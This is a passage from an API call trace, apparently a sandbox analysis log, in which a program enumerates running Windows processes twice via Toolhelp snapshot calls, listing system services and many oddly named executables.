cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0102.131] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.132] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.133] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0102.134] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0102.135] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0102.136] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.139] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0102.140] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0102.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0102.142] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0102.143] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0102.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0102.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0102.147] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0102.189] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0102.190] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0102.192] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0102.193] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0102.194] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0102.195] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0102.196] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0102.197] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0102.198] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="athletics-americans.exe")) returned 1 [0102.199] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0102.200] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0102.201] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.202] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.203] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0102.204] CloseHandle (hObject=0xc4) returned 1 [0102.204] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0102.209] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.210] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0102.210] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0102.211] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.212] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0102.212] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.213] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0102.214] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0102.215] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0102.216] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0102.217] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.218] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.219] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.219] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.221] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.222] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0102.222] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.223] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.224] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0102.267] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.268] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.270] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0102.271] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0102.272] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0102.273] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.274] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.275] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0102.276] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0102.278] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0102.279] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0102.280] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0102.281] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0102.282] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0102.284] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0102.285] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0102.286] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0102.287] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0102.288] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0102.289] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0102.290] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0102.291] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0102.292] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0102.293] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0102.294] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0102.295] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0102.296] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.297] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.299] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0102.300] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.301] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.303] 
